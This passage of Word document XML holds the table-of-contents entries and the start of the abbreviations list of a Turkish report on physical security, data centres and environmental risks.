        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          </w:rPr>
          <w:t>4.KATMANLI  SAVUNMA</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949862 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949863" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>5.FİZİKSEL GÜVENLİK TEKNOLOJİSİ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949863 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949864" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1.Güvenlik bileşenleri</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949864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3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949865" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1.1.Kilitler</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949865 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949866" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1.2.Bariyerler</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949866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3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949867" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1.3.Alarm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949867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3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949868" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>5.1.4.Kapılar</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949868 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949869" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>6.FİZİKSEL GÜVENLİĞİ BT GÜVENL</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>İK POLİTİKASI İLE BÜTÜNLEŞTİRME</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949869 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949870" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>7.BİLGİ İŞLEM MERKEZLERİ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949870 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949871" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>8.BİLGİ İŞLEM MERKEZİ EVRİMİ</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949871 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949872" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>9.KORUYUCU ÖNLEMLER</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949872 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949873" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>10.ÇEVRESEL ENDİŞELER</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949873 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949874" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.1.Topluluk</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949874 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949875" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.2.Doğanın Davranışları</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949875 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949876" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.3.Diğer Dış Riskler</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949876 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949877" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.4.Tesis</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949877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2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8212"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949878" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>10.5.Koruma Katmanları</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949878 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949879" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          </w:rPr>
          <w:t>11. KAYNAKLAR</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949879 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BC393C"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77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SİMGELER VE KISALTMALAR DİZİNİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Simgeler </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
